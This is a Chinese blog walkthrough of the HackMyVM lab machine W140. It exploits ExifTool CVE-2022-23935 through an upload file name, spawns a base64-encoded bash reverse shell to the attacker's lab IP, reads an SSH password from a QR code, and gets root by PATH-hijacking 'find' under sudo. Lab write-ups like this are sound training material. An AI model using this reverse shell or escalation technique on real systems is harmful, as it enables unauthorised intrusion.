[HackmyVM]靶场 W140

最新推荐文章于 2024-03-24 12:08:55 发布
最新推荐文章于 2024-03-24 12:08:55 发布
阅读量627 收藏 3
点赞数 4
分类专栏: hackmyvm 文章标签: 运维 网络空间安全 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136372200
版权

kali:192.168.56.104

主机发现

arp-scan -l

靶机ip:192.168.56.107

端口扫描

nmap -p- 192.168.56.107

开启了22 80 端口

目录扫描

gobuster dir -u http://192.168.56.107 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt

发现service.html可以文件上传

测试发现必须二进制内容为png或者jpeg格式才行,对文件名和文件类型并不检测

上传之后会有个文件分析的界面

利用ExifTool进行分析,版本12.37

搜索发现有CVE cowsecurity/CVE-2022-23935: CVE-2022-23935 exploit PoC exiftool version 12.37 written in python (github.com)

CVE-2022-23935-PoC-Exploit/exploit.sh at main · dpbe32/CVE-2022-23935-PoC-Exploit (github.com)

通过修改文件名进行命令执行

因为没有回显,直接反弹shell,注意对反弹shell指令base64编码

echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwNC80NTY3ICAwPiYxJw==|base64 -d|sh|

想办法提权到ghost

再/var/www目录看到一个隐藏的png文件

 把图片传给kali

发现是个二维码

用草料识别一下

密码BaoeCblP5KGJDmA

然后ssh连接ghost,下拿到第一个flag

.

sudo -l发现可以提权

用于清理日志文件和将图片所有者和所属组改为root root

而这个find指令没有明确的目录,所有我们可以伪造find

还需要修改环境变量让执行Benz-w140的时候优先执行 tmp目录下的find

/tmp$ echo "/bin/bash" > find
/tmp$ chmod +x find
/tmp$ sudo PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games /opt/Benz-w140

注意给find添加执行权限

总结

1.ExifTool CVE-2022-23935 getshell

2.环境变量劫持提权

tao0845
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透靶场——HackMyVM:Area51
tlovejr的博客
04-07 4034
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 此次靶场是针对Log4j2漏洞复现的一个靶场,大家可以直接上手操作一遍 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 扫描到存活主机ip地址为192.168.1.97 扫描端口 nmap -A -p- -T4 192.168.1.97 发现端口有的还是80/8080/22这三个端口 Web渗透 老规矩,还是先
渗透靶场——HackMyVM:Family
tlovejr的博客
03-21 1036
部署环境: 提供镜像文件后,直接用虚拟机打开即可,在这里和以往有些不同,我采取了两个虚拟机软件的形式,一个是VMware,另个就是就是vbox,连接的方式都是桥接即可 Kali机ip地址:192.168.1.5 靶机ip地址:192.168.1.6 1、扫描存活主机ip地址 arp-scan -l 2、扫描一下存活端口 nmap -v -A -p- 192.168.1.6 发现只有22端口还有80这个web端口开放,直接对80端口进行访问 3、对web80端口开始进行渗透 首页里面有一个wordp
[HackMyVM]靶场 Run
qq_34942239的博客
03-07 575
创建.gitea/workflows目录并写入一个反弹shell的yaml文件。然后用dev/developer88登录gitea。6.2.0-20-generic搜索知道有个CVE。运行actions需要运行器,下载一个运行器。然后在setting里面开启action。在设置添加runner里面获取token。之前开的监听端口也是返回了shell。密码是developer88。ip地址就是instance。不过目前还在docker里面。不过在历史文件里面可以看到。打开是一个gitea服务。
渗透靶场——HackMyVM:Tom
tlovejr的博客
03-28 2020
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 信息收集 扫描主机 arp-scan -l 发现了存活主机的ip地址为192.168.1.69 扫描端口 扫描靶机开放的服务端口 nmap -p- -A 192.168.1.69 发现有22,80,8080端口进行开放,正常情况下我们现在先在80端口开始突破 Web渗透 http://192.
hackmyvm之warez
qwweggfe的博客
09-03 429
0x01基本信息 地址:https://hackmyvm.eu/machines/machine.php?vm=Warez 靶机ip:192.168.181.159 keli IP:192.168.181.129 0x02实施过程 首先进行ip扫描 于是打开网页进行查看 于是我进行目录扫描 gobuster dir -u http://192.168.181.159/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-me..
[HackMyVM]靶场 Submissions
最新发布
qq_34942239的博客
03-24 224
binwalk stegeek都看了一下没什么东西。ssh连接之后henry目录下又user flag。我用gobuster不知道为什么扫描失败。学了一下巨魔,使用feroxbuster。索性vim看到了一个base64字符串。进去发现是个图片,那大概率是隐写了。爆破出来密码leahcim1996。easy难度的靶场开的端口就是少。web界面看了一下没什么东西。用hydra爆破一下ssh。base64解码拿到文件名。还有一个Note.txt。又学到一个工具cupp。切换到henry用户。
[HackMyVM]靶场 Nebula
qq_34942239的博客
03-22 541
第一种方法,因为我们可以write 这个head,所以可以手改head,注意修改环境变量,把head改成我们修改的head。ssh连接之后发现pmccentral没有user flag,用户目录下有个employees的文件,里面全是人名。成功跳转到laboratoryadmin用户,并且用户目录下有user.txt拿到第一个flag。第二种,就利用原来的head,因为它里面是bash -p也能让我们拿到root权限。经过md5碰撞发现pmccentral的密码是999999999。
HackMyvm靶机系列(4)-vulny
qq_70727026的博客
05-13 339
一、信息收集 老办法,先来一波网段扫描,发现主机 nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox 使用nmap扫描端口,发现两个端口,一个80端口,一个33060(不知道是什么,先不管它) nmap -sC -sV 192.168.200.153 -p- 访问主页,然而并没有发现什么有用的信息。 老办法,先来一波目录扫描,看看能不能发现什么有用的信息。 使用gobuster扫描一下目录。 gobuster dir ..
[HackMyVM]靶场 Wild
qq_34942239的博客
03-06 1043
username为realm然后再对username:realm:password进行md5加密再转16进制。在/domain/configuration/mgmt-users.properties里面发现点东西。在host-primary.xml里面发现realm name为ManagementRealm。i的16进制编码是%69,%的16进制编码是25,所以可以用%2569表示i。看下面的php源码,知道网页对iconv,/,..进行了过滤。又因为源码中过滤了iconv,可以进行双重编码绕过。
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
webgoat靶场需要自行搭建
01-19
WebGoat是一个知名的在线安全靶场,主要用于网络安全教育和练习,尤其在Web应用程序安全领域具有重要地位。这个项目由OWASP(开放网络应用安全项目)维护,旨在帮助开发者、安全人员以及学生理解和学习常见的Web应用...
uploadlabs靶场文件
02-27
这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。 【描述】:该靶场是基于PHPStudy的LAMP(Linux、Apache、MySQL、PHP)环境搭建的。"www"目录是Apache服务器默认...
开源靶场zsbdzsbd
04-19
【开源靶场zsbdzsbd】是一个专注于网络安全的开源项目,其主要目的是为网络安全爱好者、学生和专业人士提供一个实践和学习网络安全技能的平台。在这个靶场中,你可以找到各种模拟真实网络环境中存在的漏洞,通过实战...
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
vulhub漏洞测试靶场
08-16
Vulhub是一个专门为安全研究人员和渗透测试人员设计的漏洞测试靶场平台,它提供了一系列预配置的漏洞环境,用于学习和实践网络安全技能。这个平台基于Docker容器技术,使得每个漏洞环境可以独立运行,便于管理和复现...
CSRF漏洞的靶场实验
09-19
在“CSRF漏洞的靶场实验”中,我们将通过实际操作来理解这种攻击方式以及如何防御。 首先,我们需要了解CSRF攻击的基本原理。当用户访问一个网站并登录后,浏览器会保存一个叫做会话(Session)的状态,使得用户在...
vulhub靶场.zip
10-14
vulhub靶场
DVWA的靶场安装教学
06-08
DVWA靶场安装教学 DVWA(Damn Vulnerable Web Application)是一款开源的Web应用程序漏洞测试平台,旨在帮助开发者和安全研究人员学习和实践Web应用程序安全测试。DVWA靶场安装教学是学习Web应用程序安全测试的不二...
Pikachu靶场:SQL注入解题策略与信息获取
"pikachu靶场SQL注入章节解题" SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤用户输入,使得恶意构造的SQL代码能够被执行。在这个"Pikachu靶场"的SQL注入关卡中,我们将深入理解如何识别和利用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值